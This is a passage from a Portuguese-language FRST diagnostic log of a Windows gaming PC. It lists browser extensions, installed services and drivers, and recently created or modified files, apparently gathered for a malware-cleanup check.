CHR Extension: (AirDroid) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\hkgndiocipalkpejnpafdbdlfdjihomd [2021-06-28]
CHR Extension: (Disconnect) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\jeoacafpbcihiomhlakheieifhpjdfeo [2021-06-28]
CHR Extension: (Social Video Downloader) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfnnoammpigcglgbhcbbdpnekbcddahe [2021-06-28]
CHR Extension: (Free VPN for Chrome - VPN Proxy VeePN) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\majdfhpaihoncoakbjgbdhglocklcgno [2022-08-21]
CHR Extension: (Dark Theme for Google Translate) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmcamjpjiefpjagnjmkedchjkmedadhc [2022-08-18]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-06-28]
CHR Extension: (DeviantArt Filter) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\odlmamilbohnpnoomjclomghphbajikp [2021-09-21]
CHR Extension: (WebP / Avif image converter) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbcfbdlbkdfobidmdoondbgdfpjolhci [2022-02-09]
CHR Extension: (Enhancer for YouTube™) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\ponfpcnoihfmfllpaingbgckeeldkhle [2022-08-04]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl]
CHR HKLM-x32\...\Chrome\Extension: [khndhdhbebhaddchcgnalcjlaekbbeof]

==================== Serviços (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

S2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\4.02.12\atkexComSvc.exe [457544 2022-02-10] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S2 asus; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [153112 2022-05-01] (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.)
S2 AsusCertService; C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe [181576 2022-02-18] (ASUSTeK Computer Inc. -> ASUSTek COMPUTER INC.)
S3 asusm; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [153112 2022-05-01] (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.)
S2 AsusROGLSLService; C:\Program Files (x86)\ASUS\AsusROGLSLService\AsusROGLSLService.exe [650208 2022-05-01] (ASUSTeK COMPUTER INC. -> ASUS)
S2 AsusUpdateCheck; C:\WINDOWS\System32\AsusUpdateCheck.exe [845256 2022-08-21] (ASUSTeK Computer Inc. -> )
R2 BDAuxSrv; C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe [821312 2022-07-12] (Bitdefender SRL -> Bitdefender)
R2 BDProtSrv; C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe [821312 2022-07-12] (Bitdefender SRL -> Bitdefender)
R2 bdredline; C:\Program Files\Common Files\Bitdefender\SetupInformation\Bitdefender RedLine\bdredline.exe [2161256 2018-03-22] (Bitdefender SRL -> Bitdefender)
R2 bdredline_agent; C:\Program Files\Bitdefender Agent\redline\bdredline.exe [2454632 2022-02-10] (Bitdefender SRL -> Bitdefender)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-05-17] (BattlEye Innovations e.K. -> )
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811496 2022-07-02] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [584680 2022-08-19] (EasyAntiCheat Oy -> Epic Games, Inc.)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029456 2022-07-02] (Epic Games Inc. -> Epic Games, Inc.)
R2 GameSDK Service; C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe [396520 2022-01-20] (ASUSTEK COMPUTER INCORPORATION -> ASUS Inc.)
S2 LightingService; C:\Program Files (x86)\LightingService\LightingService.exe [3835360 2022-03-10] (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2579272 2022-08-09] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3497808 2022-08-09] (Electronic Arts, Inc. -> Electronic Arts)
S2 Parsec; C:\Program Files\Parsec\pservice.exe [414456 2022-05-12] (Parsec Cloud, Inc. -> Parsec)
S2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [789072 2022-07-25] (Bitdefender SRL -> Bitdefender)
S3 ProtonVPN Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPNService.exe [116840 2021-12-20] (Proton Technologies AG -> )
S3 ProtonVPN Update Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.UpdateService.exe [65128 2021-12-20] (Proton Technologies AG -> )
S3 ProtonVPN WireGuard; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe [50792 2021-12-20] (Proton Technologies AG -> )
R2 ROG Live Service; C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe [6307560 2022-04-14] (ASUSTeK COMPUTER INC. -> ASUSTek COMPUTER INC.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6215960 2022-07-23] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [16241056 2022-07-13] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender Security\updatesrv.exe [280128 2022-08-08] (Bitdefender SRL -> Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe [821312 2022-07-12] (Bitdefender SRL -> Bitdefender)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\NisSrv.exe [2644776 2021-06-28] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe [136656 2021-06-28] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WirelessKB850NotificationService; C:\WINDOWS\system32\WirelessKB850NotificationService.exe [176624 2018-05-14] (Microsoft Corporation -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_47917a79b8c7fd22\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_47917a79b8c7fd22\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Drivers (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

S3 AcxHdAudio; C:\WINDOWS\System32\drivers\AcxHdAudio.sys [557056 2022-05-12] (Microsoft Corporation) [Arquivo não assinado]
R1 Asusgio2; C:\WINDOWS\system32\drivers\AsIO2.sys [34384 2022-02-10] (ASUSTeK Computer Inc. -> )
R1 Asusgio3; C:\WINDOWS\system32\drivers\AsIO3.sys [43168 2022-02-18] (ASUSTeK Computer Inc. -> )
R1 atc; C:\WINDOWS\System32\DRIVERS\atc.sys [4802976 2022-05-10] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender S.R.L. Bucharest, ROMANIA)
R2 BdDci; C:\WINDOWS\System32\DRIVERS\bddci.sys [800672 2021-12-15] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [22976 2020-12-18] (Microsoft Windows Early Launch Anti-malware Publisher -> Bitdefender)
R0 bdprivmon; C:\WINDOWS\System32\DRIVERS\bdprivmon.sys [33208 2022-03-02] (Microsoft Windows Hardware Compatibility Publisher -> © Bitdefender SRL)
S3 bduefiscan; C:\WINDOWS\system32\DRIVERS\bduefiscan.sys [55864 2021-12-10] (Bitdefender SRL -> Bitdefender)
R2 BlueStacksDrv_nxt; C:\Program Files\BlueStacks_nxt\BstkDrv_nxt.sys [321784 2022-05-25] (Bluestack Systems, Inc -> Bluestack System Inc.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [507904 2021-11-04] (Microsoft Corporation) [Arquivo não assinado]
S3 BTHMODEM; C:\WINDOWS\System32\drivers\bthmodem.sys [98304 2021-06-05] (Microsoft Corporation) [Arquivo não assinado]
R1 CTIAIO; C:\WINDOWS\system32\drivers\CtiAIo64.sys [31808 2022-05-01] (Microsoft Windows Hardware Compatibility Publisher -> Creative Technology Innovation Co., LTd.)
S3 dc3d; C:\WINDOWS\System32\drivers\dc3d.sys [47616 2011-05-18] (Hardware Group Test Cert -> Microsoft Corporation)
R3 DroidCam; C:\WINDOWS\System32\drivers\droidcam.sys [32240 2020-04-10] (Microsoft Windows Hardware Compatibility Publisher -> Dev47Apps)
R3 DroidCamVideo; C:\WINDOWS\System32\DriverStore\FileRepository\droidcamvideo.inf_amd64_47e18363cbf3dfe0\droidcamvideo.sys [33784 2021-04-09] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
R0 Gemma; C:\WINDOWS\System32\DRIVERS\gemma.sys [1262496 2022-06-05] (Microsoft Windows Hardware Compatibility Publisher -> BitDefender S.R.L. Bucharest, ROMANIA)
R3 iaLPSS2_GPIO2_ADL; C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_gpio2_adl.inf_amd64_e11257f05c0c2f89\iaLPSS2_GPIO2_ADL.sys [139928 2021-07-29] (Intel Corporation -> Intel Corporation)
R3 iaLPSS2_I2C_ADL; C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_i2c_adl.inf_amd64_778b19a5f4d49cba\iaLPSS2_I2C_ADL.sys [202896 2021-07-29] (Intel Corporation -> Intel Corporation)
R0 iaStorVD; C:\WINDOWS\System32\drivers\iaStorVD.sys [1587376 2021-10-19] (Intel Corporation -> Intel Corporation)
R2 Ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [185312 2020-10-07] (Bitdefender SRL -> Bitdefender)
R4 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [46728 2022-04-14] (ASUSTEK COMPUTER INC. -> ASUSTeK Computer Inc.)
S3 ksophon_x64; C:\WINDOWS\system32\drivers\ksophon_x64.sys [9966728 2022-08-13] (PROXIMA BETA PTE. LIMITED -> PROXIMA BETE)
R2 Ld9BoxSup; C:\Program Files\ldplayer9box\Ld9BoxSup.sys [376144 2022-08-19] (Shanghai Chang Zhi Network Technology Co,. Ltd. -> Oracle Corporation)
R1 MSIO; C:\WINDOWS\system32\drivers\MsIo64.sys [17424 2020-01-19] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48552 2021-11-01] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation)
S3 ProtonVPNCallout; C:\Program Files (x86)\Proton Technologies\ProtonVPN\x64\Win10\ProtonVPN.CalloutDriver.sys [34176 2021-05-28] (Microsoft Windows Hardware Compatibility Publisher -> Proton Technologies AG)
S3 rtcx21; C:\WINDOWS\System32\DriverStore\FileRepository\rtcx21x64.inf_amd64_d2a498d51a4f7bec\rtcx21x64.sys [409000 2021-06-01] (Realtek Semiconductor Corp.
-> Realtek) R3 tapprotonvpn; C:\WINDOWS\System32\drivers\tapprotonvpn.sys [49024 2021-05-28] (Microsoft Windows Hardware Compatibility Publisher -> The OpenVPN Project) R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [633264 2022-06-05] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender) R1 ViGEmBus; C:\WINDOWS\System32\drivers\ViGEmBus.sys [165744 2020-12-14] (Microsoft Windows Hardware Compatibility Publisher -> Nefarius Software Solutions e.U.) R0 vlflt; C:\WINDOWS\System32\DRIVERS\vlflt.sys [474048 2022-05-10] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender) S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [49568 2021-06-28] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [425184 2021-06-28] (Microsoft Windows -> Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [76000 2021-06-28] (Microsoft Windows -> Microsoft Corporation) S3 wintun; C:\WINDOWS\System32\drivers\wintun.sys [29680 2022-02-02] (Microsoft Windows Hardware Compatibility Publisher -> WireGuard LLC) S3 WirelessKeyboardFilter; C:\WINDOWS\System32\drivers\WirelessKeyboardFilter.sys [49336 2018-03-11] (Microsoft Corporation -> Microsoft Corporation) R3 WOVAD; C:\WINDOWS\System32\drivers\womic.sys [51192 2022-01-14] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider) S3 cpuz152; \??\C:\WINDOWS\temp\cpuz152\cpuz152_x64.sys [X] S3 cpuz153; \??\C:\WINDOWS\temp\cpuz153\cpuz153_x64.sys [X] S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X] ==================== NetSvcs (Whitelisted) =================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) ==================== Um mês (criados) (Whitelisted) ========= (Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.) 
2022-08-21 19:20 - 2022-08-21 19:31 - 000039196 _____ C:\Users\trean\Desktop\FRST.txt 2022-08-21 19:19 - 2022-08-21 19:30 - 000000000 ____D C:\FRST 2022-08-21 19:16 - 2022-08-21 19:16 - 002371072 _____ (Farbar) C:\Users\trean\Desktop\FRST64.exe 2022-08-21 19:14 - 2022-08-21 19:14 - 008551608 _____ (Malwarebytes) C:\Users\trean\Desktop\adwcleaner.exe 2022-08-21 19:14 - 2022-08-21 19:14 - 000000000 ____D C:\AdwCleaner 2022-08-21 19:06 - 2022-08-21 19:09 - 000000000 ____D C:\Users\trean\Desktop\Ryujinx-MyTry 2022-08-21 19:06 - 2022-08-21 19:06 - 000000000 ____D C:\Users\trean\Desktop\9Cloud_377001_1 2022-08-21 18:07 - 2022-08-21 18:07 - 000292636 _____ C:\Users\trean\Documents\backup cccleaner.reg 2022-08-21 05:46 - 2022-08-21 18:45 - 000000000 ____D C:\Users\trean\Desktop\build 2022-08-19 02:54 - 2022-08-19 02:54 - 000000223 _____ C:\Users\trean\Desktop\MultiVersus.url 2022-08-18 04:45 - 2022-08-18 04:45 - 000001623 _____ C:\WINDOWS\system32\config\VSMIDK 2022-08-18 04:11 - 2022-08-18 04:11 - 000000000 ____D C:\Program Files (x86)\Intel 2022-08-17 00:00 - 2022-08-17 00:00 - 000000000 ____D C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Citra 2022-08-13 19:38 - 2022-08-13 19:38 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla 2022-08-13 02:59 - 2022-08-13 02:59 - 009966728 _____ (PROXIMA BETE) C:\WINDOWS\system32\Drivers\ksophon_x64.sys 2022-08-13 02:59 - 2022-08-13 02:59 - 000000000 ____D C:\Users\trean\AppData\Roaming\DSS 2022-08-13 02:49 - 2022-08-13 02:58 - 000000000 ____D C:\Users\trean\AppData\Local\Hotta 2022-08-13 02:48 - 2022-08-19 00:37 - 000000000 ____D C:\Users\trean\AppData\Roaming\tof_launcher 2022-08-13 02:48 - 2022-08-13 02:57 - 000001968 _____ C:\Users\Public\Desktop\Tower of Fantasy.lnk 2022-08-13 02:48 - 2022-08-13 02:48 - 000001080 _____ C:\Users\trean\AppData\Roaming\tof_launcher.reg 2022-08-13 02:48 - 2022-08-13 02:48 - 000000000 ____D C:\Users\trean\AppData\Local\RailCrashReport 2022-08-13 02:48 - 2022-08-13 02:48 - 
000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tower of Fantasy 2022-08-13 02:37 - 2022-08-13 02:37 - 000000000 ____D C:\Users\trean\AppData\Local\tofMiniLoader 2022-08-13 02:37 - 2022-08-13 02:37 - 000000000 ____D C:\ProgramData\intl_ua 2022-08-11 03:10 - 2022-08-16 15:12 - 000000000 ____D C:\Program Files\Mozilla Firefox 2022-08-10 15:36 - 2022-08-10 15:36 - 000015026 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim 2022-08-10 15:34 - 2022-08-10 15:34 - 000000000 ___HD C:\$WinREAgent 2022-08-10 15:32 - 2022-08-10 15:32 - 000000000 ____D C:\Users\Default\.dotnet 2022-08-09 18:16 - 2022-07-22 01:25 - 000043184 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvhdap64.dll 2022-08-09 18:15 - 2022-07-28 04:28 - 001905920 _____ C:\WINDOWS\system32\vulkaninfo-1-999-0-0-0.exe 2022-08-09 18:15 - 2022-07-28 04:28 - 001905920 _____ C:\WINDOWS\system32\vulkaninfo.exe 2022-08-09 18:15 - 2022-07-28 04:28 - 001478408 _____ C:\WINDOWS\SysWOW64\vulkaninfo-1-999-0-0-0.exe 2022-08-09 18:15 - 2022-07-28 04:28 - 001478408 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe 2022-08-09 18:15 - 2022-07-28 04:27 - 001471992 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll 2022-08-09 18:15 - 2022-07-28 04:27 - 001432320 _____ C:\WINDOWS\system32\vulkan-1-999-0-0-0.dll 2022-08-09 18:15 - 2022-07-28 04:27 - 001432320 _____ C:\WINDOWS\system32\vulkan-1.dll 2022-08-09 18:15 - 2022-07-28 04:27 - 001213432 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll 2022-08-09 18:15 - 2022-07-28 04:27 - 001145600 _____ C:\WINDOWS\SysWOW64\vulkan-1-999-0-0-0.dll 2022-08-09 18:15 - 2022-07-28 04:27 - 001145600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll 2022-08-09 18:15 - 2022-07-28 04:24 - 000865776 _____ C:\WINDOWS\system32\nvofapi64.dll 2022-08-09 18:15 - 2022-07-28 04:24 - 000771576 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvml.dll 2022-08-09 18:15 - 2022-07-28 04:24 - 000687608 _____ C:\WINDOWS\SysWOW64\nvofapi.dll 2022-08-09 18:15 - 2022-07-28 04:23 - 002127872 _____ (NVIDIA 
Corporation) C:\WINDOWS\system32\NvFBC64.dll 2022-08-09 18:15 - 2022-07-28 04:23 - 001607680 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll 2022-08-09 18:15 - 2022-07-28 04:23 - 001536504 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll 2022-08-09 18:15 - 2022-07-28 04:23 - 001182712 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll 2022-08-09 18:15 - 2022-07-28 04:23 - 000714752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvidia-smi.exe 2022-08-09 18:15 - 2022-07-28 04:22 - 010269688 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll 2022-08-09 18:15 - 2022-07-28 04:22 - 008803832 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll 2022-08-09 18:15 - 2022-07-28 04:22 - 005362672 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll 2022-08-09 18:15 - 2022-07-28 04:22 - 003066872 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll 2022-08-09 18:15 - 2022-07-28 04:22 - 001059328 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll 2022-08-09 18:15 - 2022-07-28 04:22 - 000845296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll 2022-08-09 18:15 - 2022-07-28 04:22 - 000456176 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdebugdump.exe 2022-08-09 18:15 - 2022-07-28 04:21 - 005735920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll 2022-08-09 18:15 - 2022-07-28 04:21 - 000852976 _____ (NVIDIA Corporation) C:\WINDOWS\system32\MCU.exe 2022-08-09 18:15 - 2022-07-22 01:25 - 000093241 _____ C:\WINDOWS\system32\nvinfo.pb 2022-08-09 05:24 - 2022-08-09 05:24 - 000099204 _____ C:\ProgramData\agent.update.1660033453.bdinstall.v2.bin 2022-08-08 05:39 - 2022-08-08 05:39 - 045282638 _____ C:\Users\trean\Desktop\Street Fighter 6 - Kimberly and Juri Gameplay Trailer.mp4 2022-08-08 00:46 - 2022-08-08 00:49 - 000000000 ____D C:\Users\trean\Desktop\espaço 2022-08-07 22:54 - 2022-08-07 22:54 - 000001826 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OBS Studio.lnk 
2022-08-07 22:53 - 2022-08-07 22:54 - 000001568 _____ C:\Users\trean\Desktop\OBS Studio.lnk 2022-08-07 22:49 - 2022-08-07 22:49 - 000000000 ____D C:\Users\trean\Desktop\OBS-Studio-28.0-beta1-Full-x64 2022-08-06 04:32 - 2022-08-08 20:56 - 000000000 ____D C:\Users\trean\Desktop\EnslaverDarkPath-0.2.5-pc 2022-08-04 04:43 - 2022-08-04 04:44 - 000000000 ____D C:\Users\trean\Desktop\Monster 2022-08-03 13:05 - 2022-08-15 04:12 - 000000787 _____ C:\Users\trean\Desktop\LDPlayer9.lnk 2022-08-03 08:27 - 2022-08-03 08:27 - 001137565 _____ C:\Users\trean\Desktop\cry and eat.mp4 2022-08-02 01:34 - 2022-08-21 05:48 - 000000000 ____D C:\Users\trean\.Ld9VirtualBox 2022-08-02 01:34 - 2022-08-19 06:40 - 000000000 ____D C:\Program Files\ldplayer9box 2022-08-02 01:34 - 2022-08-15 04:12 - 000000836 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\LDMultiPlayer9.lnk 2022-08-02 01:34 - 2022-08-15 04:12 - 000000811 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\LDPlayer9.lnk 2022-08-02 01:34 - 2022-08-02 01:34 - 000000000 ____D C:\Users\trean\Documents\XuanZhi9 2022-08-02 01:34 - 2022-08-02 01:34 - 000000000 ____D C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LDPlayer9 2022-08-02 01:33 - 2022-08-19 06:40 - 000000000 ____D C:\Users\trean\AppData\Roaming\XuanZhi9 2022-07-31 20:40 - 2022-07-31 20:40 - 000000218 _____ C:\Users\trean\AppData\Local\recently-used.xbel 2022-07-25 07:54 - 2022-07-30 08:20 - 000000000 ____D C:\Users\trean\Documents\GitHub 2022-07-25 07:52 - 2022-08-21 19:14 - 000000000 ____D C:\Users\trean\AppData\Roaming\GitHub Desktop 2022-07-25 07:52 - 2022-07-25 07:52 - 000002367 _____ C:\Users\trean\Desktop\GitHub Desktop.lnk 2022-07-25 07:52 - 2022-07-25 07:52 - 000000178 _____ C:\Users\trean\.gitconfig 2022-07-25 07:52 - 2022-07-25 07:52 - 000000000 ____D C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GitHub, Inc 2022-07-25 07:52 - 2022-07-25 07:52 - 000000000 ____D 
C:\Users\trean\AppData\Local\GitHubDesktop 2022-07-25 07:51 - 2022-07-25 07:51 - 049381480 _____ (The Git Development Community ) C:\Users\trean\Desktop\Git-2.37.1-64-bit.exe 2022-07-23 04:41 - 2022-07-23 04:41 - 000335872 _____ C:\WINDOWS\system32\Windows.Management.InprocObjects.dll 2022-07-23 04:41 - 2022-07-23 04:41 - 000327680 _____ C:\WINDOWS\system32\pnpdiag.dll 2022-07-23 04:41 - 2022-07-23 04:41 - 000069632 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2022-07-23 04:41 - 2022-07-23 04:41 - 000041472 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2022-07-23 00:37 - 2022-07-23 00:42 - 000000000 ____D C:\Users\trean\AppData\LocalLow\CAPCOM 2022-07-23 00:21 - 2022-07-23 00:22 - 000000000 ____D C:\Users\trean\Desktop\EmuSAK-win32-x64-2.1.9-portable ==================== Um mês (modificados) ================== (Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.) 2022-08-21 19:18 - 2021-06-28 06:52 - 000000000 ____D C:\ProgramData\NVIDIA 2022-08-21 19:14 - 2021-06-28 06:47 - 000000000 ____D C:\Users\trean\AppData\Roaming\discord 2022-08-21 19:14 - 2021-06-05 09:10 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2022-08-21 19:10 - 2021-06-28 06:45 - 000000000 ____D C:\Program Files (x86)\Steam 2022-08-21 19:09 - 2021-06-28 06:46 - 000000000 ____D C:\Users\trean\AppData\Local\Discord 2022-08-21 19:03 - 2021-06-28 06:45 - 000000000 ____D C:\Program Files (x86)\Google 2022-08-21 19:01 - 2021-07-01 19:33 - 000000000 ____D C:\Users\trean\AppData\Local\CrashDumps 2022-08-21 19:01 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\SystemTemp 2022-08-21 18:53 - 2022-05-07 12:55 - 000004784 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeShadowStackRollbackTask 2022-08-21 18:53 - 2021-06-28 06:35 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2022-08-21 18:53 - 2021-06-05 09:10 - 000000000 ___HD C:\Program Files\WindowsApps 2022-08-21 18:53 - 2021-06-05 09:10 - 000000000 ____D 
C:\WINDOWS\AppReadiness 2022-08-21 18:45 - 2021-06-29 11:03 - 000000000 ____D C:\Users\trean\AppData\Roaming\MPC-HC 2022-08-21 18:30 - 2021-06-29 20:23 - 000000000 ____D C:\Users\trean\Downloads\Telegram Desktop 2022-08-21 18:16 - 2022-03-09 15:39 - 001769330 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2022-08-21 18:16 - 2021-06-05 14:55 - 000766494 _____ C:\WINDOWS\system32\prfh0416.dat 2022-08-21 18:16 - 2021-06-05 14:55 - 000153688 _____ C:\WINDOWS\system32\prfc0416.dat 2022-08-21 18:16 - 2021-06-05 09:09 - 000000000 ____D C:\WINDOWS\INF 2022-08-21 18:09 - 2022-05-01 06:41 - 000901328 _____ () C:\WINDOWS\system32\wpbbin.exe 2022-08-21 18:09 - 2022-05-01 06:41 - 000845256 _____ C:\WINDOWS\system32\AsusUpdateCheck.exe 2022-08-21 18:09 - 2022-04-01 16:03 - 000000000 ____D C:\Users\trean\.elevenclock 2022-08-21 18:09 - 2022-03-09 15:39 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2022-08-21 18:09 - 2021-07-09 18:34 - 000000000 ____D C:\Users\trean\AppData\Roaming\WTablet 2022-08-21 18:09 - 2021-07-09 04:18 - 000000000 ____D C:\Program Files\TeamViewer 2022-08-21 18:09 - 2021-06-28 06:35 - 000012288 ___SH C:\DumpStack.log.tmp 2022-08-21 18:09 - 2021-06-28 05:32 - 000000000 ____D C:\Intel 2022-08-21 18:09 - 2021-06-05 09:01 - 001048576 _____ C:\WINDOWS\system32\config\BBI 2022-08-21 18:06 - 2022-06-30 01:39 - 000000000 ____D C:\WINDOWS\SysWOW64\directx 2022-08-21 18:06 - 2021-07-10 23:05 - 000001155 _____ C:\Users\trean\Desktop\MSI Afterburner.lnk 2022-08-21 18:06 - 2021-07-10 23:05 - 000000000 ____D C:\Program Files (x86)\RivaTuner Statistics Server 2022-08-21 18:06 - 2021-07-09 04:18 - 000000000 ____D C:\Users\trean\AppData\Roaming\TeamViewer 2022-08-21 18:05 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\LiveKernelReports 2022-08-21 17:55 - 2021-10-10 18:24 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job 2022-08-21 17:14 - 2022-03-09 15:35 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2022-08-21 00:19 - 2022-02-15 03:20 - 000000000 
